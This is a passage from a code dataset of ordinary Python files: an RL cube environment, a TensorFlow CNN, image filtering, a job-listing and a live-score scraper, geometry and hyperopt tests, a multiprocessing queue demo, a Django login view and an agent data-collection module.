#####################################\n #####################################\n\n # CHOOSE one of these goal options here:\n # goal_options = [half_up, half_down, half_left, half_right, slight_right, slight_left, slight_down, slight_up, left, right, up, down]\n # goal_options = [half_up, half_down, half_left, half_right]\n # goal_options = [half_up, half_down, half_left, half_right, slight_right, slight_left, slight_down, slight_up]\n # goal_options = [left, right]\n # goal_options = [up, down]\n\n #####################################\n #####################################\n self._max_steps = max_steps\n self._same_goals = same_goals\n self._goal_options = [GOAL_TASKS[k] for k in goal_task]\n super(SafemrlCubeEnv, self).__init__()\n self._last_score = self.get_score(self.unwrapped.obs_dict)\n\n @property\n def last_score(self):\n return self._last_score\n\n def do_reset(self, reset_pose, reset_vel, reset_goal=None):\n obs = super(SafemrlCubeEnv, self).do_reset(reset_pose, reset_vel, reset_goal)\n self._last_score = self.get_score(self.unwrapped.obs_dict)\n return obs\n\n def step(self, a):\n # removes everything but score from output info\n a = np.array(a).squeeze()\n o, r, d, i = super(SafemrlCubeEnv, self).step(a)\n self._last_score = i['score']\n i = {'score': i['score']}\n return o, r, d, i\n\n def create_goal_trajectory(self):\n\n len_of_goals = self._max_steps\n\n # A single rollout consists of alternating between 2 (same or diff) goals:\n if self._same_goals:\n goal_selected1 = np.random.randint(len(self._goal_options))\n goal_selected2 = goal_selected1\n else:\n goal_selected1 = np.random.randint(len(self._goal_options))\n goal_selected2 = np.random.randint(len(self._goal_options))\n goals = [self._goal_options[goal_selected1], self._goal_options[goal_selected2]]\n\n # Create list of these goals\n time_per_goal = 35\n step_num = 0\n curr_goal_num = 0\n goal_traj = []\n while step_num < len_of_goals:\n goal_traj.append(np.tile(goals[curr_goal_num], (time_per_goal, 1)))\n if curr_goal_num == 0:\n curr_goal_num = 1\n else:\n curr_goal_num = 0\n step_num += time_per_goal\n\n goal_traj = np.concatenate(goal_traj)\n return goal_traj\n\n\n@gin.configurable\nclass CubeTaskAgnWrapper(gym.Wrapper):\n def __init__(self, env):\n super(CubeTaskAgnWrapper, self).__init__(env)\n self.observation_space = gym.spaces.Dict({\n 'observation': self.observation_space,\n 'task_agn_rew': gym.spaces.Box(np.array(0), np.array(1))\n })\n\n def step(self, action):\n o, r, d, i = super(CubeTaskAgnWrapper, self).step(action)\n o_dict = {'observation': o, 'task_agn_rew': 0.}\n if d and self.env.reward_dict.get('drop_penalty', 0) != 0:\n o_dict['task_agn_rew'] = 1.\n return o_dict, r, d, i\n\n def reset(self, **kwargs):\n o = super(CubeTaskAgnWrapper, self).reset(**kwargs)\n return {'observation': o, 'task_agn_rew': 0.}\n","sub_path":"safemrl/envs/cube_env.py","file_name":"cube_env.py","file_ext":"py","file_size_in_byte":3942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"556057329","text":"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport math\n\nimport tensorflow as tf\nimport config\n\n\nIMAGE_SIZE = config.patch_size\nNUM_CLASSES = config.num_classes\nCHANNELS = config.channels\nIMAGE_PIXELS = IMAGE_SIZE * IMAGE_SIZE * CHANNELS\n\n\n\nKERNEL_NUM = config.contextual_kernel_num\nWEIGHT_DECAY = 0.00001\nKEEP_PROB = 0.5 # factor of dropout\n\n\n\nglobal IS_TRAINING\n\n\ndef inference(images, is_training):\n \"\"\"Build the model up to where it may be used for inference.\n Args:\n images: Images placeholder.\n is_training: True or False.\n\n Returns:\n logits: Output tensor with the computed logits.\n \"\"\" \n \n global IS_TRAINING\n IS_TRAINING = is_training\n\n \n images = tf.reshape(images, [-1, IMAGE_SIZE, IMAGE_SIZE, CHANNELS])\n \n logits = network(images)\n \n return logits\n\n\ndef network(_input):\n output = multi_scale(_input)\n output = add_res_blocks(output)\n output = last_three_conv(output)\n output = softmax(output)\n print (output)\n return output\n \ndef multi_scale(_input):\n _input = tf.pad(_input, paddings=[[0,0],[2,2],[2,2],[0,0]])\n with tf.variable_scope('multi_conv1'):\n output1 = conv2d(_input, KERNEL_NUM, 5, weight_stddev=0.1, biases_init=1.0)\n with tf.variable_scope('multi_conv2'):\n output2 = conv2d(_input, KERNEL_NUM, 3, weight_stddev=0.1, biases_init=1.0)\n output2 = max_pooling(output2, ksize=[1, 3, 3, 1])\n with tf.variable_scope('multi_conv3'):\n output3 = conv2d(_input, KERNEL_NUM, 1, weight_stddev=0.1, biases_init=1.0)\n output3 = max_pooling(output3, ksize=[1, 5, 5, 1])\n output = tf.concat(axis=3, values=(output1, output2, output3))\n output = tf.nn.relu(output)\n output = local_response_norm(output)\n print (output)\n return output\n \n \ndef add_res_blocks(_input):\n with tf.variable_scope('res_conv1') as scope:\n output = conv2d(_input, KERNEL_NUM, 1, weight_stddev=0.1, biases_init=1.0)\n output = tf.nn.relu(output)\n output = local_response_norm(output)\n \n with tf.variable_scope('res_block1') as scope:\n output = add_one_block(output)\n with tf.variable_scope('res_block2') as scope:\n output = add_one_block(output)\n return output\n \n \ndef add_one_block(_input):\n \"\"\"Add one residual block.\n There are two layers in one block.\n \"\"\"\n # layer 1\n with tf.variable_scope('conv_1') as scope:\n output = conv2d(_input, KERNEL_NUM, 1, weight_stddev=0.05, biases_init=1.0)\n output = tf.nn.relu(output)\n print (output)\n \n # layer 2\n with tf.variable_scope('conv_2') as scope:\n output = conv2d(output, KERNEL_NUM, 1, weight_stddev=0.05, biases_init=1.0)\n output = output + _input\n output = tf.nn.relu(output)\n print (output)\n return output\n \ndef last_three_conv(_input):\n with tf.variable_scope('conv_1') as scope:\n output = conv2d(_input, KERNEL_NUM, 1, weight_stddev=0.05, biases_init=1.0)\n output = tf.nn.relu(output)\n output = dropout(output)\n\n with tf.variable_scope('conv_2') as scope:\n output = conv2d(output, KERNEL_NUM, 1, weight_stddev=0.05, biases_init=1.0)\n output = tf.nn.relu(output)\n output = dropout(output)\n\n with tf.variable_scope('conv_3') as scope:\n output = conv2d(output, KERNEL_NUM, 1, weight_stddev=0.1, biases_init=0.0)\n print (output)\n return output\n\n\ndef softmax(_input):\n features_total = int(_input.get_shape()[1]) * int(_input.get_shape()[2]) * int(_input.get_shape()[3])\n output = tf.reshape(_input, [-1, features_total])\n with tf.variable_scope('softmax') as scope:\n weights = weight_variable_normal(\n [features_total, NUM_CLASSES],\n name='weights', stddev=0.01)\n weight_decay = tf.multiply(tf.nn.l2_loss(weights), WEIGHT_DECAY, name='weight_loss')\n tf.add_to_collection('losses', weight_decay)\n \n biases = tf.Variable(tf.zeros([NUM_CLASSES]),\n name='biases')\n output = tf.matmul(output, weights) + biases\n return output\n\ndef conv2d(_input, out_features, kernel_size,\n strides=[1, 1, 1, 1], padding='VALID', weight_stddev=0.01, biases_init=1.0):\n in_features = int(_input.get_shape()[-1])\n kernel = weight_variable_normal(\n [kernel_size, kernel_size, in_features, out_features],\n name='kernel', stddev=weight_stddev)\n \n weight_decay = tf.multiply(tf.nn.l2_loss(kernel), WEIGHT_DECAY, name='weight_loss')\n tf.add_to_collection('losses', weight_decay)\n \n biases = tf.get_variable('biases', shape=[out_features], \n initializer=tf.constant_initializer(biases_init))\n output = tf.nn.conv2d(_input, kernel, strides, padding) + biases\n return output\n\n\ndef weight_variable_normal(shape, name, stddev):\n return tf.get_variable(\n name=name,\n shape=shape,\n initializer=tf.truncated_normal_initializer(mean=0.0, stddev=stddev))\n\n\ndef max_pooling(_input, ksize, strides=[1, 1, 1, 1], padding='VALID'):\n return tf.nn.max_pool(_input, ksize=ksize, strides=strides, \n padding=padding, name='max_pool')\n \n \ndef local_response_norm(_input):\n return tf.nn.lrn(_input, depth_radius=4, bias=1.0, alpha=0.001 / 9.0, beta=0.75, name='lrn')\n \n\n\n\ndef dropout(_input):\n if KEEP_PROB < 1:\n output = tf.cond(\n IS_TRAINING,\n lambda: tf.nn.dropout(_input, KEEP_PROB),\n lambda: _input\n )\n else:\n output = _input\n return output\n\n\n\n# Define the loss function\ndef loss(logits, labels):\n \"\"\"Calculates the loss from the logits and the labels.\n Args:\n logits: Logits tensor, float - [batch_size, NUM_CLASSES].\n labels: Labels tensor, int32 - [batch_size].\n Returns:\n loss: Loss tensor of type float.\n \"\"\"\n labels = tf.to_int64(labels)\n cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(\n logits=logits, labels=labels, name='xentropy')\n loss = tf.reduce_mean(cross_entropy, name='xentropy_mean')\n\n return loss\n\n\n# Define the Training OP\ndef training(loss, learning_rate):\n \"\"\"Sets up the training Ops.\n Creates an optimizer and applies the gradients to all trainable variables.\n The Op returned by this function is what must be passed to the\n `sess.run()` call to cause the model to train.\n Args:\n loss: Loss tensor, from loss().\n learning_rate: The learning rate to use for gradient descent.\n Returns:\n train_op: The Op for training.\n \"\"\"\n # Create the gradient descent optimizer with the given learning rate.\n optimizer = tf.train.RMSPropOptimizer(learning_rate, \n decay=0.9, momentum=0.0, epsilon=1e-10, \n use_locking=False, name='RMSProp')\n # Create a variable to track the global step.\n global_step = tf.Variable(0, name='global_step', trainable=False)\n # Use the optimizer to apply the gradients that minimize the loss\n # (and also increment the global step counter) as a single training step.\n train_op = optimizer.minimize(loss, global_step=global_step)\n return train_op\n\n\n# Return the Predicting result\ndef predicting(logits):\n \"\"\"Return the predicting result of logits.\n Args:\n logits: Logits tensor, float - [batch_size, NUM_CLASSES].\n Returns:\n prediction: Prediction tensor, int32 - [batch_size], with values in the\n range [0, NUM_CLASSES).\n \"\"\"\n softmax = tf.nn.softmax(logits)\n prediction = tf.argmax(softmax, axis=1)\n return prediction\n","sub_path":"SSDC_code/contextualcnn.py","file_name":"contextualcnn.py","file_ext":"py","file_size_in_byte":7641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"513853601","text":"# import cv2\r\n#\r\n# import numpy as np\r\n#\r\n#\r\n# # Gaussian filter\r\n#\r\n# def gaussian_filter(img, K_size=3, sigma=1.3):\r\n# if len(img.shape) == 3:\r\n#\r\n# H, W, C = img.shape\r\n#\r\n# else:\r\n#\r\n# img = np.expand_dims(img, axis=-1)\r\n#\r\n# H, W, C = img.shape\r\n#\r\n# ## Zero padding\r\n#\r\n# pad = K_size // 2\r\n#\r\n# out = np.zeros((H + pad * 2, W + pad * 2, C), dtype=np.float)\r\n#\r\n# out[pad: pad + H, pad: pad + W] = img.copy().astype(np.float)\r\n#\r\n# ## prepare Kernel\r\n#\r\n# K = np.zeros((K_size, K_size), dtype=np.float)\r\n#\r\n# for x in range(-pad, -pad + K_size):\r\n#\r\n# for y in range(-pad, -pad + K_size):\r\n# K[y + pad, x + pad] = np.exp(-(x ** 2 + y ** 2) / (2 * (sigma ** 2)))\r\n#\r\n# K /= (2 * np.pi * sigma * sigma)\r\n#\r\n# K /= K.sum()\r\n#\r\n# tmp = out.copy()\r\n#\r\n# # filtering\r\n#\r\n# for y in range(H):\r\n#\r\n# for x in range(W):\r\n#\r\n# for c in range(C):\r\n# out[pad + y, pad + x, c] = np.sum(K * tmp[y: y + K_size, x: x + K_size, c])\r\n#\r\n# out = np.clip(out, 0, 255)\r\n#\r\n# out = out[pad: pad + H, pad: pad + W].astype(np.uint8)\r\n#\r\n# return out\r\n#\r\n#\r\n# # Read image\r\n#\r\n# img = cv2.imread(\"2.jpg\")\r\n#\r\n# # Gaussian Filter\r\n#\r\n# out = gaussian_filter(img, K_size=10, sigma=10)\r\n# # Save result\r\n#\r\n# cv2.imwrite(\"out.jpg\", out)\r\n#\r\n# cv2.imshow(\"result\", out)\r\n#\r\n# cv2.waitKey(0)\r\n#\r\n# cv2.destroyAllWindows()\r\nimport cv2\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nimg = cv2.imread('2.jpg')\r\nimg = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n# Apply gradient filtering\r\nsobel_x = cv2.Sobel(img, cv2.CV_64F, dx = 1, dy = 0, ksize = 5)\r\nsobel_y = cv2.Sobel(img, cv2.CV_64F, dx = 0, dy = 1, ksize = 5)\r\nblended = cv2.addWeighted(src1=sobel_x, alpha=0.5, src2=sobel_y,\r\n beta=0.5, gamma=0)\r\nlaplacian = cv2.Laplacian(img, cv2.CV_64F)\r\n# Plot the images\r\nimages = [sobel_x, sobel_y, blended, laplacian]\r\nnames = ['sobel_x', 'sobel_y', 'blended', 'laplacian']\r\nplt.figure(figsize = (14, 10))\r\nfor i in range(4):\r\n plt.subplot(2, 2, i+1)\r\n plt.imshow(images[i], cmap = 'gray')\r\n plt.title(names[i],fontsize=20,color='white')\r\n plt.axis('off')\r\nplt.show()\r\n\r\n","sub_path":"FFT/low.py","file_name":"low.py","file_ext":"py","file_size_in_byte":2232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"568920707","text":"# -*- coding: utf-8 -*-\n\"\"\"\nZhaopin_Special spider created on the top of ATSSpider\n\nscrapy crawl zhaopin_special -a mining_job_id=9999 -a extract=1 -a iteration=1 -a url=\"http://special.zhaopin.com/bf/2014/abbx102285/\"\n\nSeed URL:\n http://special.zhaopin.com/bf/2014/abbx102285/\n http://special.zhaopin.com/pagepublish/13891071/\n http://special.zhaopin.com/pagepublish/14235114/\n http://special.zhaopin.com/pagepublish/34450211/index.html\n\nSample Job URL:\n http://jobs.zhaopin.com/190176813252277.htm?ssidkey=y&ff=02&ss=101\n\"\"\"\n\nfrom re import compile\nfrom scrapy.http import Request\nfrom scrapy.selector import Selector\nfrom urlparse import urlparse\n\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import ConvertDateString, Prefix\n\npattern = {\n 'ref_number': compile(r'(\\d+)\\.htm'),\n 'response_page': compile(r'var\\s*arrJobList\\s*=\\s*\\n([^$]*)\\nvar\\s*HotJobs'),\n 'jobs_link': compile(r'\\\"(http:\\/\\/jobs\\.zhaopin\\.com([^\"]*))'),\n}\n\n\nclass Zhaopin_Special(ATSSpider):\n\n name = 'zhaopin_special'\n\n def parse(self, response):\n \"\"\"\n Parse SERP page and call GET method to each job urls\n \"\"\"\n sel = Selector(response)\n if not urlparse(response.url).path.startswith('/pagepublish/'):\n # Parse list of companies with jobs list.\n # loop over to each company and extract the jobs list\n # Once again loop over to jobs list and call GET method\n # to each job urls.\n for tr in sel.xpath(\n '//td/table[@class=\"joblist\"]/tr[@class=\"deptitem\"]'\n ):\n for jobitem in tr.xpath(\n './following::tr[1]/td/table[@class=\"joblist\"]/tr[@class=\"jobitem\"]/td/a/@href'\n ).extract():\n if jobitem:\n yield Request(\n callback=self.parse_job_callback(),\n url=jobitem\n )\n else:\n # Some pages having jobs list in javascript section.\n # match the pattern with response and extract matched string\n # Finding all jobs link from raw_response.\n # call GET method to each job urls\n match = pattern['response_page'].search(response.body)\n if match:\n raw_response = match.group(1)\n jobs_link = pattern['jobs_link'].findall(raw_response)\n if jobs_link:\n for job_url in jobs_link:\n yield Request(\n callback=self.parse_job_callback(),\n url=job_url[0]\n )\n else:\n jobs = sel.xpath('//span[@id=\"joblist\"]//tr/td[@class=\"jobclass\"]//a/@href').extract()\n for job in jobs:\n yield Request(\n callback=self.parse_job_callback(),\n url=job\n )\n\n def parse_job(self, response):\n \"\"\"\n Extract all required information.\n \"\"\"\n sel = Selector(response)\n expired_job = sel.xpath('//div[@class=\"expired-img\"]').extract()\n if not expired_job:\n location_xpaths = [\n '//div[contains(@class, \"terminalpage\")]/div/ul/li/span[contains(text(), \"%s\")]/following-sibling::strong//text()' % unicode('工作地点:', 'utf-8'),\n '//div[@class=\"company-box\"]/ul/li/span[contains(text(), \"%s\")]/following-sibling::strong/text()' % unicode('公司地址:', 'utf-8'),\n '//span[@id=\"positionCityCon\"]//text()',\n ]\n\n loader = BrightcorpItemLoader(selector=sel)\n loader.add_xpath(\n 'title',\n [\n '//div/div[@class=\"inner-left fl\"]/h1/text()',\n '//table[@class=\"terminalpage-table\"]//h1/text()',\n ]\n )\n loader.add_xpath(\n 'date',\n '//ul/li/strong/span[@id=\"span4freshdate\"]/text()',\n ConvertDateString('%Y-%m-%d')\n )\n loader.add_value(\n 'referencenumber',\n response.url,\n Prefix('%s-' % self.name),\n re=pattern['ref_number']\n )\n loader.add_value('url', response.url)\n loader.add_xpath(\n 'company',\n '//div/div[@class=\"inner-left fl\"]/h2/a/text() |'\n '//div[@class=\"company-box\"]/p[@class=\"company-name-t\"]/a/text()|'\n '//table[@class=\"terminalpage-table\"]//td/h2//text()'\n )\n loader.add_xpath('location', location_xpaths)\n loader.add_xpath(\n 'description',\n '//div[contains(@class, \"terminalpage-main\")]/div[@class=\"tab-cont-box\"]/div[1]/*[not(self::h1 or self::h2 or self::p/button or self::p/a)] |'\n '//div[contains(@class, \"terminalpage-main\")]/div[@class=\"tab-cont-box\"]/div[1]/*[self::p[1] or self::div[1]][not(self::p/button)] |'\n '//div[contains(@class, \"terminalpage-main\")]/div[@class=\"tab-cont-box\"]/div[1]/text()|'\n '//div[@class=\"terminalpage-content\"]'\n )\n loader.add_xpath(\n 'jobtype',\n '//div[contains(@class, \"terminalpage\")]/div/ul/li/span[contains(text(), \"%s\")]/following-sibling::strong/text()' % unicode('工作性质:', 'utf-8')\n )\n loader.add_xpath(\n 'jobcategory',\n '//div[contains(@class, \"terminalpage\")]/div/ul/li/span[contains(text(), \"%s\")]/following-sibling::strong//text()' % unicode('职位类别:', 'utf-8')\n )\n loader.add_xpath(\n 'industry',\n '//div[@class=\"company-box\"]/ul/li/span[contains(text(), \"%s\")]/following-sibling::strong//text()' % unicode('公司行业:', 'utf-8')\n )\n loader.add_xpath(\n 'baseSalary',\n '//div[contains(@class, \"terminalpage\")]/div/ul/li/span[contains(text(), \"%s\")]/following-sibling::strong/text()' % unicode('职位月薪:', 'utf-8')\n )\n loader.add_xpath(\n 'experiencerequirements',\n '//div[contains(@class, \"terminalpage\")]/div/ul/li/span[contains(text(), \"%s\")]/following-sibling::strong/text()' % unicode('工作经验:', 'utf-8')\n )\n loader.add_xpath(\n 'qualifications',\n '//div[contains(@class, \"terminalpage\")]/div/ul/li/span[contains(text(), \"%s\")]/following-sibling::strong/text()' % unicode('最低学历:', 'utf-8')\n )\n loader.add_value('apply_url', response.url)\n\n yield loader.load_item()\n","sub_path":"brightcorp/brightcorp/spiders/zhaopin_special.py","file_name":"zhaopin_special.py","file_ext":"py","file_size_in_byte":6863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"379382187","text":"import pygeos\nimport pytest\nimport numpy as np\n\nfrom .common import point_polygon_testdata\nfrom .common import point, polygon\n\n\ndef test_area():\n assert pygeos.area(polygon) == 4.0\n\n\ndef test_area_nan():\n actual = pygeos.area(np.array([polygon, np.nan, None]))\n assert actual[0] == pygeos.area(polygon)\n assert np.isnan(actual[1])\n assert np.isnan(actual[2])\n\n\ndef test_distance():\n actual = pygeos.distance(*point_polygon_testdata)\n expected = [2 * 2 ** 0.5, 2 ** 0.5, 0, 0, 0, 2 ** 0.5]\n np.testing.assert_allclose(actual, expected)\n\n\ndef test_distance_nan():\n actual = pygeos.distance(\n np.array([point, np.nan, np.nan, point, None, None, point]),\n np.array([np.nan, point, np.nan, None, point, None, point]),\n )\n assert actual[-1] == 0.0\n assert np.isnan(actual[:-1].astype(np.float)).all()\n\n\ndef test_haussdorf_distance():\n # example from GEOS docs\n a = pygeos.linestrings([[0, 0], [100, 0], [10, 100], [10, 100]])\n b = pygeos.linestrings([[0, 100], [0, 10], [80, 10]])\n actual = pygeos.hausdorff_distance(a, b)\n assert actual == pytest.approx(22.360679775, abs=1e-7)\n\n\ndef test_haussdorf_distance_densify():\n # example from GEOS docs\n a = pygeos.linestrings([[0, 0], [100, 0], [10, 100], [10, 100]])\n b = pygeos.linestrings([[0, 100], [0, 10], [80, 10]])\n actual = pygeos.hausdorff_distance(a, b, densify=0.001)\n assert actual == pytest.approx(47.8, abs=0.1)\n","sub_path":"pygeos/test/test_measurement.py","file_name":"test_measurement.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"596290294","text":"'''\nExample 02: Exploring Undersampling - how assumptions can be wrong about a\nmodel if the sampling is insufficient\n'''\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport polyreg\n\nplt.close()\n\n# Generate some data with noise\nN = 5\nsize = (N,1)\n\n# Generate an example of the actual function\nxe = np.array([0,1,2,3])[np.newaxis].T\nye = np.array([0,2,4,6])[np.newaxis].T\n \nx = np.array([0,0.5,1,1.5,2,2.5,3,4])[np.newaxis].T\ny = np.array([0,5,2,0,4,0,6,0.53])[np.newaxis].T\n\nplt.figure(num=1, figsize=(4, 4), dpi=150)\nax = plt.plot(xe,ye,\n color=0.9*np.array([1,1,1]),\n linewidth=3,\n linestyle='none',\n marker='o',\n markeredgecolor='k',\n label='Observations')\nplt.axis([0,5,-5,10])\nplt.xlabel('x')\nplt.ylabel('f(x)')\nplt.gca().grid('on')\nplt.tight_layout()\n \n# Plot the function and the data\nplt.figure(num=2, figsize=(4, 4), dpi=150)\n\n# Fit progressively more complex polynomial models\norder_to_estimate = 9\nnModels = 1\n\ncolors = np.array([0, 216, 93])/255\n\n# Initialize the polynomial\npoly_estimator = polyreg.PolyReg(x,y)\n\n# Fit and plot each polynomial\nx_plot = np.linspace(0,5,300)[np.newaxis].T\npoly_estimator.train(order_to_estimate)\ny_hat = poly_estimator.test(x_plot)\nplt.plot(x_plot,y_hat,\n color=colors,\n linewidth=2.5,\n label='Target Function')\nplt.plot(xe,ye,\n color=0.9*np.array([1,1,1]),\n linewidth=3,\n linestyle='none',\n marker='o',\n markeredgecolor='k',\n label='Observations')\nplt.plot(x[-1],y[-1],\n color=0.25*np.array([1,1,1]),\n linewidth=3,\n linestyle='none',\n marker='o',\n label='Target Value')\n\n# Plot legend outside axis\nplt.gca().grid('on')\nax = plt.gca()\naxes_bbox = ax.get_position()\nplt.xlabel('x')\nplt.ylabel('f(x)')\nplt.axis([0,5,-5,10])\nplt.legend()\nplt.tight_layout()","sub_path":"lecture01b.py","file_name":"lecture01b.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"511994422","text":"#!/usr/bin/python3.4\nimport urllib.request\nfrom bs4 import BeautifulSoup\nimport sys\n\ndef gethtmlformurl(url):\n try:\n a = str(urllib.request.urlopen(url).read().decode('utf-8'))\n return a;\n except Exception:\n print(\"Please check your network !!\")\n exit(0)\n\n\ndef main():\n if len(sys.argv) > 1:\n if sys.argv[1]==\"-help\":\n print(\"usage => python livematch.py [live/ended]\")\n elif sys.argv[1]==\"live\":\n getscores(gethtmlformurl(\"http://canlimacsonuclari.hurriyet.com.tr/livescore.aspx\"))\n elif sys.argv[1] == \"ended\":\n getscores(gethtmlformurl(\"http://canlimacsonuclari.hurriyet.com.tr/macsonuclari.aspx\"))\n else:\n print('usage => python livematch.py [live/ended]')\n\n else:\n print(\"usage => python livematch.py [live/ended]\")\n\n\n\n\n\n\n\n\n\n\n\ndef form(s):\n return s.replace(\" \",\"\").replace(\"\\n\",\"\").replace(\"'\",\"\").replace('\\\\',\"\")\n\ndef addnsbc(s):\n\n a=s\n for num in range(0,30-len(s)):\n a= a+\" \"\n\n return a\n\ndef trim(s):\n if s.endswith(\" \"): s = s[:-1]\n if s.startswith(\" \"): s = s[1:]\n return s\n\n\ndef getscores(doc):\n soup = BeautifulSoup(''.join(doc))\n soup= BeautifulSoup(soup.decode('utf-8','ignore'))\n tags = soup.find_all(attrs={\"class\" : \"L9GRAY\",\"bgcolor\":\"#ffcc00\"})\n\n for tag in tags:\n for names in tag.find_all(attrs={\"align\" : \"right\"}):\n right_name=form(names.text)\n for names in tag.find_all(attrs={\"align\" : \"left\"}):\n left_name=form(names.text)\n for score in tag.find_all(attrs={\"width\":\"34\",\"align\":\"center\",\"bgcolor\":\"#ff9900\"}):\n score = form(score.text)\n for time in tag.find_all(attrs={\"width\" : \"120\"}):\n time = form(time.text)\n\n\n row = addnsbc(time)+\" \"+addnsbc(right_name)+\" \"+addnsbc(score)+\" \"+addnsbc(left_name)\n print(row)\n\n\n\nif __name__ == '__main__':\n main()\n\n\n\n\n\n\n","sub_path":"score.py","file_name":"score.py","file_ext":"py","file_size_in_byte":1941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"392164645","text":"import random, time, queue\nfrom multiprocessing.managers import BaseManager\n\n# 发送任务队列\ntask_qu = queue.Queue()\n\n# 接收队列\nresult_qu = queue.Queue()\n\n\n# 从BaseManager继承的QueueManager\n\nclass QueueManager(BaseManager):\n\tpass\n\n\n# 把两个queue都注册到网络上,callable参数关联Queue对象\nQueueManager.register('get_task_queue', callable=lambda: task_qu)\nQueueManager.register('get_result_queue', callable=lambda: result_qu)\n\n# 绑定端口5000,验证码abc\nmanager = QueueManager(address=('', 5000), authkey='abc'.encode('utf-8'))\n\n# 启动queue\nmanager.start()\n\n# 获得通过网络访问的queue\ntask = manager.get_task_queue()\nresult = manager.get_result_queue()\n\n# 放任务\nfor i in range(10):\n\t# n = random.randint(0, 1000)\n\tn = i\n\tprint(f'put {n}')\n\ttask.put(n)\n\n# 从队列读取\nprint('get results...')\nfor i in range(10):\n\tr = result.get(timeout=1000)\n\tprint(f'result = {r}')\n\n# 关闭\nmanager.shutdown()\nprint('master proc ended')\n","sub_path":"courses_by_liaoxuefeng/10进程和线程/5分布式进程/task_master.py","file_name":"task_master.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"412082485","text":"import xdj\n@xdj.controllers.Controller(\n url=\"login\",\n template=\"login.html\"\n)\nclass LoginController(xdj.BaseController):\n def __init__(self):\n from django.conf import settings\n self.supportLanguages=[]\n for k,v in settings.LANGUAGE_DICT.items():\n if k in [\"vi\",\"en\"]:\n self.supportLanguages.append(\n xdj.dobject(\n value = k,\n caption =v\n )\n )\n def on_get(selfs,sender):\n if isinstance(sender,xdj.Model):\n sender.username=\"\"\n sender.isError=False\n sender.languages=selfs.supportLanguages\n return selfs.render(sender)\n def on_post(selfs,sender):\n if isinstance(sender, xdj.Model):\n sender.languages = selfs.supportLanguages\n from django.contrib.auth import authenticate, login\n user = authenticate(username=sender.post_data.username[0], password=sender.post_data.password[0])\n if user is not None:\n login(sender.request, user)\n return sender.redirect(sender.appUrl)\n else:\n sender.isError=True\n\n sender.username=sender.post_data.username[0]\n return selfs.render(sender)","sub_path":"sysadmin/controllers/login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"177171022","text":"\nfrom hyperopt import fmin, rand, tpe, hp, Trials\n\n\ndef test_quadratic1_rand():\n trials = Trials()\n\n argmin = fmin(\n fn=lambda x: (x - 3) ** 2,\n space=hp.uniform('x', -5, 5),\n algo=rand.suggest,\n max_evals=500,\n trials=trials)\n\n assert len(trials) == 500\n assert abs(argmin['x'] - 3.0) < .25\n\n\ndef test_quadratic1_tpe():\n trials = Trials()\n\n argmin = fmin(\n fn=lambda x: (x - 3) ** 2,\n space=hp.uniform('x', -5, 5),\n algo=tpe.suggest,\n max_evals=50,\n trials=trials)\n\n assert len(trials) == 50, len(trials)\n assert abs(argmin['x'] - 3.0) < .25, argmin\n","sub_path":"hyperopt/tests/test_fmin.py","file_name":"test_fmin.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"452499905","text":"# -*- coding: utf-8 -*-\nfrom collections import defaultdict\n\n\n__author__ = \"Mike Belov\"\n__copyright__ = \"Copyright (C) 2015, Nginx Inc. All rights reserved.\"\n__credits__ = [\"Mike Belov\", \"Andrei Belov\", \"Ivan Poluyanov\", \"Oleg Mamontov\", \"Andrew Alexeev\"]\n__license__ = \"\"\n__maintainer__ = \"Mike Belov\"\n__email__ = \"dedm@nginx.com\"\n\n\n\nclass Singleton(object):\n def __new__(cls, *args, **kwargs):\n if not hasattr(cls, '_instance'):\n cls._instance = super(Singleton, cls).__new__(cls)\n return cls._instance\n\n\nclass CommonDataTank(Singleton):\n def __init__(self):\n self.clients = defaultdict(dict)\n\n def register(self, type, object_id, client):\n \"\"\"\n Registers some client\n :param type: object type (prefix)\n :param object_id: object id\n :param client: some client\n \"\"\"\n self.clients[type][object_id] = client\n\n def unregister(self, type, object_id):\n \"\"\"\n Unregisters client\n :param type: object type (prefix)\n :param object_id: object id\n \"\"\"\n del self.clients[type][object_id]\n\n def flush(self, type):\n result = {}\n for object_id, client in self.clients.get(type, {}).iteritems():\n data = client.flush()\n if data:\n result[object_id] = data\n return result\n\n\n\nclass CommonDataClient(object):\n def __init__(self, object=None):\n self.object = object\n self.current = {}\n self.delivery = {}\n","sub_path":"amplify/agent/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"22570463","text":"# from pip._internal import main as pipmain\n# pipmain(['install', 'git+https://github.com/huggingface/transformers.git'])\nimport pandas as pd\nimport numpy as np\nfrom transformers import AutoTokenizer, AutoModelForSeq2SeqLM\nimport tensorflow as tf\nimport tensorflow_hub as hub\nfrom tensorflow import keras\nimport spacy\n# !python -m spacy download en\nnlp = spacy.load('en')\n\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom sklearn.metrics.pairwise import euclidean_distances\n\nimport nltk\n# nltk.download('punkt')\n# nltk.download('stopwords')\n# 